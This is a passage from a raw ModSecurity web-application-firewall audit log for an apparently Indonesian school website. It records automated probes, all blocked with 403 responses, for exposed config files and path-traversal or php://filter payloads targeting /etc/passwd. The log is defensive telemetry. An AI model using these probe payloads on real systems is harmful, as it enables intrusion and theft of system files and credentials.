"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069963827752 2339 (- - -) Stopwatch2: 1746069963827752 2339; combined=959, p1=411, p2=519, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fcb7170-Z-- --1d448337-A-- [01/May/2025:10:26:11 +0700] aBLp04144kZ4LAGlEgzx_gAAANg 103.236.140.4 50998 103.236.140.4 8181 --1d448337-B-- GET /ftp.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1d448337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d448337-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069971128600 1534 (- - -) Stopwatch2: 1746069971128600 1534; combined=685, p1=313, p2=348, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d448337-Z-- --743d0500-A-- [01/May/2025:10:26:14 +0700] aBLp1o144kZ4LAGlEgzyBQAAANU 103.236.140.4 51140 103.236.140.4 8181 --743d0500-B-- GET /ftps.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --743d0500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --743d0500-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069974171484 2408 (- - -) Stopwatch2: 1746069974171484 2408; combined=1048, p1=455, p2=560, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --743d0500-Z-- --4efa7659-A-- [01/May/2025:10:26:14 +0700] aBLp1sVMAgMJpNzaVtKrEAAAAFQ 103.236.140.4 51150 103.236.140.4 8181 --4efa7659-B-- GET /ftp-config.conf HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4efa7659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4efa7659-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069974374557 1932 (- - -) Stopwatch2: 1746069974374557 1932; combined=705, p1=316, p2=361, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4efa7659-Z-- --db50e102-A-- [01/May/2025:10:26:15 +0700] aBLp14144kZ4LAGlEgzyDwAAANA 103.236.140.4 51198 103.236.140.4 8181 --db50e102-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --db50e102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db50e102-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069975316335 844 (- - -) Stopwatch2: 1746069975316335 844; combined=306, p1=269, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db50e102-Z-- --fb924e71-A-- [01/May/2025:10:26:15 +0700] aBLp14144kZ4LAGlEgzyEgAAANE 103.236.140.4 51208 103.236.140.4 8181 --fb924e71-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --fb924e71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb924e71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069975517617 756 (- - -) Stopwatch2: 1746069975517617 756; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb924e71-Z-- --c08c9900-A-- [01/May/2025:10:26:49 +0700] aBLp-cVMAgMJpNzaVtKrjwAAAEc 103.236.140.4 52808 103.236.140.4 8181 --c08c9900-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c08c9900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c08c9900-E-- --c08c9900-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070009673860 2180 (- - -) Stopwatch2: 1746070009673860 2180; combined=626, p1=430, p2=168, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c08c9900-Z-- --fe22a462-A-- [01/May/2025:10:26:49 +0700] aBLp-Sgtr0Qsi1mFAsMJFwAAAIE 103.236.140.4 52818 103.236.140.4 8181 --fe22a462-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --fe22a462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe22a462-E-- --fe22a462-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070009875108 2164 (- - -) Stopwatch2: 1746070009875108 2164; combined=620, p1=450, p2=142, p3=0, p4=0, p5=28, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe22a462-Z-- --ae9f546a-A-- [01/May/2025:10:26:50 +0700] aBLp-sVMAgMJpNzaVtKrkwAAAEM 103.236.140.4 52832 103.236.140.4 8181 --ae9f546a-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ae9f546a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae9f546a-E-- --ae9f546a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010077119 1630 (- - -) Stopwatch2: 1746070010077119 1630; combined=427, p1=325, p2=82, p3=0, p4=0, p5=20, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae9f546a-Z-- --c122b41f-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANKQAAAAM 103.236.140.4 52846 103.236.140.4 8181 --c122b41f-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c122b41f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c122b41f-E-- --c122b41f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010279791 1955 (- - -) Stopwatch2: 1746070010279791 1955; combined=593, p1=423, p2=140, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c122b41f-Z-- --15df6108-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANKwAAABQ 103.236.140.4 52852 103.236.140.4 8181 --15df6108-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --15df6108-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15df6108-E-- --15df6108-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010480800 2504 (- - -) Stopwatch2: 1746070010480800 2504; combined=672, p1=467, p2=165, p3=0, p4=0, p5=40, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15df6108-Z-- --6ecc8048-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANLQAAAA8 103.236.140.4 52866 103.236.140.4 8181 --6ecc8048-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6ecc8048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ecc8048-E-- --6ecc8048-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010682824 1496 (- - -) Stopwatch2: 1746070010682824 1496; combined=478, p1=344, p2=105, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ecc8048-Z-- --fc928f2f-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANMAAAAAI 103.236.140.4 52876 103.236.140.4 8181 --fc928f2f-B-- GET /download.php?file=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --fc928f2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc928f2f-E-- --fc928f2f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010883700 1619 (- - -) Stopwatch2: 1746070010883700 1619; combined=407, p1=301, p2=85, p3=0, p4=0, p5=21, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc928f2f-Z-- --775f335f-A-- [01/May/2025:10:26:51 +0700] aBLp-4144kZ4LAGlEgzycgAAAM4 103.236.140.4 52890 103.236.140.4 8181 --775f335f-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --775f335f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --775f335f-E-- --775f335f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070011085078 2023 (- - -) Stopwatch2: 1746070011085078 2023; combined=663, p1=491, p2=142, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --775f335f-Z-- --e5fb8347-A-- [01/May/2025:10:26:51 +0700] aBLp-4144kZ4LAGlEgzydQAAAMc 103.236.140.4 52900 103.236.140.4 8181 --e5fb8347-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --e5fb8347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5fb8347-E-- --e5fb8347-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070011286155 2171 (- - -) Stopwatch2: 1746070011286155 2171; combined=597, p1=438, p2=133, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5fb8347-Z-- --4466d710-A-- [01/May/2025:10:33:59 +0700] aBLrp4144kZ4LAGlEgz3qgAAANA 103.236.140.4 44870 103.236.140.4 8181 --4466d710-B-- GET /config.inc.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4466d710-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4466d710-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070439988097 2413 (- - -) Stopwatch2: 1746070439988097 2413; combined=843, p1=414, p2=394, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for 